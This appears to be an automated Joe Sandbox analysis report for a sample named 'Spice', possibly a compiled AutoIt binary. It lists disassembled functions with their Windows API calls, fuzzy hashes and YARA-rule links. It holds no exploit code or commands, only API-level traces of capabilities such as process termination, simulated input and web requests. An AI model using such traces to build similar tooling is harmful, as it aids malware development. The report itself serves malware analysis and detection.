Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 65774237e1f4240c23f706e300b590850dd8410e85eac211da1a113120f63b21
Instruction ID: ce8cbc920ecb4d95051ba81093e7d6da8917e66babf57ddd949f0dcc799848b5
Opcode Fuzzy Hash: 65774237e1f4240c23f706e300b590850dd8410e85eac211da1a113120f63b21
Instruction Fuzzy Hash: 9541613460014CEFDB22CF18C489BE57BE5FF05318F1891A9EB489F2A2CB32A845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00EE7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00EE550C,?,?,00000000,00000001), ref: 00EE7796

Part of subcall function 00EE406C: GetWindowRect.USER32(?,?), ref: 00EE407F

GetDesktopWindow.USER32 ref: 00EE77C0
GetWindowRect.USER32(00000000), ref: 00EE77C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EE77F9

Part of subcall function 00ED57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00ED5877

GetCursorPos.USER32(?), ref: 00EE7825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EE7883

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b23c79351279d882994d6f8236e32fa387934b259844a8789373b5a1a745b5a6
Instruction ID: fd0aebe65727915ff23c1e207557c6c44d2673ce73f1b2dda7e34580b24e6b00
Opcode Fuzzy Hash: b23c79351279d882994d6f8236e32fa387934b259844a8789373b5a1a745b5a6
Instruction Fuzzy Hash: 5831E172508359ABD724DF14DC49F9BB7EAFF88314F00091AF589A7181CB30E909CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EC8CDE
Part of subcall function 00EC8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EC8CE8
Part of subcall function 00EC8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EC8CF7
Part of subcall function 00EC8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EC8CFE
Part of subcall function 00EC8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EC8D14

GetLengthSid.ADVAPI32(?,00000000,00EC904D), ref: 00EC9482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EC948E
HeapAlloc.KERNEL32(00000000), ref: 00EC9495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00EC94AE
GetProcessHeap.KERNEL32(00000000,00000000,00EC904D), ref: 00EC94C2
HeapFree.KERNEL32(00000000), ref: 00EC94C9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f1f59da48ea048276615682f9099aed0eae6a3d72a97ac23695a313c18ac7998
Instruction ID: 16777a5c82da45f55f5b2f967149151475f2b4fda24f602b83b745f8f8718972
Opcode Fuzzy Hash: f1f59da48ea048276615682f9099aed0eae6a3d72a97ac23695a313c18ac7998
Instruction Fuzzy Hash: A211AC72501608EFDB289FA4CD89FAF7BB9FB4531AF10901CE855E7211CB369902DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EC9200
OpenProcessToken.ADVAPI32(00000000), ref: 00EC9207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EC9216
CloseHandle.KERNEL32(00000004), ref: 00EC9221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC9250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00EC9264

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: c09d514c24d1368ff987c8a023de53a27ee9031fe2c77f2797e3a620fda184d4
Instruction ID: 8a6ba7046544d218c8d383f43db03f345cec9120c4ecc211cbcfa1c16c08113c
Opcode Fuzzy Hash: c09d514c24d1368ff987c8a023de53a27ee9031fe2c77f2797e3a620fda184d4
Instruction Fuzzy Hash: 80114A7250120EABDF018F94ED4DFDE7BA9FB08709F044018FA04A2160CA769D61EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00ECC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00ECC34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00ECC35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ECC366
ReleaseDC.USER32(00000000,00000000), ref: 00ECC36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ECC385
MulDiv.KERNEL32(000009EC,?,?), ref: 00ECC397

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: c7600ec4eff5b9964d03a8f660ab4f747fe510ec2a3b4dadd48a9bb23163397f
Instruction ID: ab42ed1067e20b0a356afc762547df42e812b1647d1cadafcfb5c2732109a6af
Opcode Fuzzy Hash: c7600ec4eff5b9964d03a8f660ab4f747fe510ec2a3b4dadd48a9bb23163397f
Instruction Fuzzy Hash: E2018471E00209BBEF109BA59D49F5EBFB8EB48711F004065FA08A7280DA319C11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00EFC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00E716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E71729
Part of subcall function 00E716CF: SelectObject.GDI32(?,00000000), ref: 00E71738
Part of subcall function 00E716CF: BeginPath.GDI32(?), ref: 00E7174F
Part of subcall function 00E716CF: SelectObject.GDI32(?,00000000), ref: 00E71778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EFC57C
LineTo.GDI32(00000000,00000003,?), ref: 00EFC590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC59E
LineTo.GDI32(00000000,00000000,?), ref: 00EFC5AE
EndPath.GDI32(00000000), ref: 00EFC5BE
StrokePath.GDI32(00000000), ref: 00EFC5CE

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: bc0761f08a089a209894235794ab7a1f4979693a2dc580749cbd5bfc6acca5cb
Instruction ID: e46c6ee7af02a305c7e9d0486381a0dd7df8e00775e4e7fc9836daab85f086d3
Opcode Fuzzy Hash: bc0761f08a089a209894235794ab7a1f4979693a2dc580749cbd5bfc6acca5cb
Instruction Fuzzy Hash: B611DB7600420DBFDF129F94DC88FAA7FADFF08364F148051BA185A160DB71AE55EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E907BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E907EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00E907F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E907FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E9080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00E90812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9081A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 867ec9caca53b297a43c7514f5273fdd4377f13cae9113d0da7af54f07f20ae8
Instruction ID: 1d5b8e992f6f6f2651de8bce03707d581577eecf23b8dd84b66e65d79a89fb08
Opcode Fuzzy Hash: 867ec9caca53b297a43c7514f5273fdd4377f13cae9113d0da7af54f07f20ae8
Instruction Fuzzy Hash: 47016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00ED59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ED59B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ED59CA
GetWindowThreadProcessId.USER32(?,?), ref: 00ED59D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED59E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED59F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ED59F9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d02c1051a3d4ec469064abfc3163c50092664f099d618901b13d83f8ddcb082c
Instruction ID: 190a3ab01e98aa75e4569199b8c5edd59a955ed8d98c14f64cef7c8a5812f460
Opcode Fuzzy Hash: d02c1051a3d4ec469064abfc3163c50092664f099d618901b13d83f8ddcb082c
Instruction Fuzzy Hash: 93F01D3224115CBBE7215B929C0DFEF7A7CFBC6B11F000159FA0591050DFA11A1196B5

Uniqueness

Uniqueness Score: -1.00%

Function 00ED77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00ED77FE
EnterCriticalSection.KERNEL32(?,?,00E7C2B6,?,?), ref: 00ED780F
TerminateThread.KERNEL32(00000000,000001F6,?,00E7C2B6,?,?), ref: 00ED781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E7C2B6,?,?), ref: 00ED7829

Part of subcall function 00ED71F0: CloseHandle.KERNEL32(00000000,?,00ED7836,?,00E7C2B6,?,?), ref: 00ED71FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED783C
LeaveCriticalSection.KERNEL32(?,?,00E7C2B6,?,?), ref: 00ED7843

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 8f4bbae2b0439b58267779940601cd4da7439be131df7b7a9e621b6784fe67d6
Instruction ID: dd5845f2388400426cdea5dbaf81dd296eb9b4c0452807f3655a0d06f759c864
Opcode Fuzzy Hash: 8f4bbae2b0439b58267779940601cd4da7439be131df7b7a9e621b6784fe67d6
Instruction Fuzzy Hash: 38F0A036145216EFD7222B64EC8CBEB777AFF49306F142422F243A51A0DFB55802EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC9555
UnloadUserProfile.USERENV(?,?), ref: 00EC9561
CloseHandle.KERNEL32(?), ref: 00EC956A
CloseHandle.KERNEL32(?), ref: 00EC9572
GetProcessHeap.KERNEL32(00000000,?), ref: 00EC957B
HeapFree.KERNEL32(00000000), ref: 00EC9582

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 9f90bf435fb96d11ed5254d4c5eb9bb8c6e51c0933a3dc40ca6adb26d49611e1
Instruction ID: 55d6cadef92d43dd07440eaaa3ae76cc0a3a798c243493f89bef0ba4c1598787
Opcode Fuzzy Hash: 9f90bf435fb96d11ed5254d4c5eb9bb8c6e51c0933a3dc40ca6adb26d49611e1
Instruction Fuzzy Hash: 9DE07576104509BBDB411FE5EC0CA5ABF79FF49722F504621F21991470CF72A461EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EE8CFD
CharUpperBuffW.USER32(?,?), ref: 00EE8E0C
VariantClear.OLEAUT32(?), ref: 00EE8F84

Part of subcall function 00ED7B1D: VariantInit.OLEAUT32(00000000), ref: 00ED7B5D
Part of subcall function 00ED7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00ED7B66
Part of subcall function 00ED7B1D: VariantClear.OLEAUT32(00000000), ref: 00ED7B72

Strings

Incorrect Parameter format, xrefs: 00EE8D35, 00EE8EF7
AUTOIT.ERROR, xrefs: 00EE8E12

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 9162da07562d797e014c101e67eb31777ebac75a88dd57ad1a6c795ae0cd6c50
Instruction ID: 1fedefcbf6b830f669b0b5edc55929a0236a0591a0cc587189a06244583fbb22
Opcode Fuzzy Hash: 9162da07562d797e014c101e67eb31777ebac75a88dd57ad1a6c795ae0cd6c50
Instruction Fuzzy Hash: 0591AE70608345DFC710DF25C98095ABBF5EF89314F14996EF88AAB3A2DB31E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00ED323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8436A: _wcscpy.LIBCMT ref: 00E8438D

_memset.LIBCMT ref: 00ED332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED3410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ED343E

Strings

0, xrefs: 00ED331A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: f2ca5c8da58ce379a23bf81aa8d2974bd951c5868211441c95a3fa9eef50f2fc
Instruction ID: a895ec1c85b5121913fb057600c684baec90699b710190c561d4a788fa842981
Opcode Fuzzy Hash: f2ca5c8da58ce379a23bf81aa8d2974bd951c5868211441c95a3fa9eef50f2fc
Instruction Fuzzy Hash: 6951EF716083019EC725AB38D94566BB7E8EF45328F04262EF8A5B22A1DB74CA46C753

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED2F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ED2F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00ED2FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F37890,00000000), ref: 00ED3012

Strings

0, xrefs: 00ED2F5C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 4878172dc1c577dad73d82fd4125029872670c80e1b876953743f3cdcbc2c82d
Instruction ID: 4b7055ed4594822154b9d515f5dc7d8bf64ae0705eae19cc2ead237ee4d282d0
Opcode Fuzzy Hash: 4878172dc1c577dad73d82fd4125029872670c80e1b876953743f3cdcbc2c82d
Instruction Fuzzy Hash: C14180312083419FD720DF24C884B5ABBE8EF84314F145A1EF5A5B7391DB70EA06CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EC9ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EC9ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00EC9B0F

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

Strings

ListBox, xrefs: 00EC9A8B
ComboBox, xrefs: 00EC9A56

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 4cd6178d02a1c1d70f239fed921e0dcdcb9fb31598993f569531dea333268e5e
Instruction ID: c95475b0428a7531ba008af050d42fb111bdedeba7abd88cb34b1640b5c0e4b2
Opcode Fuzzy Hash: 4cd6178d02a1c1d70f239fed921e0dcdcb9fb31598993f569531dea333268e5e
Instruction Fuzzy Hash: DB21E4719401047EDB18ABA0DC4AEFEB7ADEF41350F105259F829B72E1DF364D069720

Uniqueness

Uniqueness Score: -1.00%

Function 00EE1EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EE1F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE1F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EE1F6E
InternetCloseHandle.WININET(00000000), ref: 00EE1FB5

Part of subcall function 00EE2B4F: GetLastError.KERNEL32(?,?,00EE1EE3,00000000,00000000,00000001), ref: 00EE2B64
Part of subcall function 00EE2B4F: SetEvent.KERNEL32(?,?,00EE1EE3,00000000,00000000,00000001), ref: 00EE2B79

Strings

, xrefs: 00EE1F5F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 308b185bee3c98a93bb18c98d4191fbacbd77de0d987107d95d1329f94a4c198
Instruction ID: 278cec561a0d2d3abdb4df7d6b6e8ea222f372098295229afd1b8930b452510d
Opcode Fuzzy Hash: 308b185bee3c98a93bb18c98d4191fbacbd77de0d987107d95d1329f94a4c198
Instruction Fuzzy Hash: B121BEB160424CBEEB119F618C85FBF77EDFF88748F10115AF505A6240EB349D449BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E72111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E7214F
Part of subcall function 00E72111: GetStockObject.GDI32(00000011), ref: 00E72163
Part of subcall function 00E72111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E7216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EF6A86
LoadLibraryW.KERNEL32(?), ref: 00EF6A8D
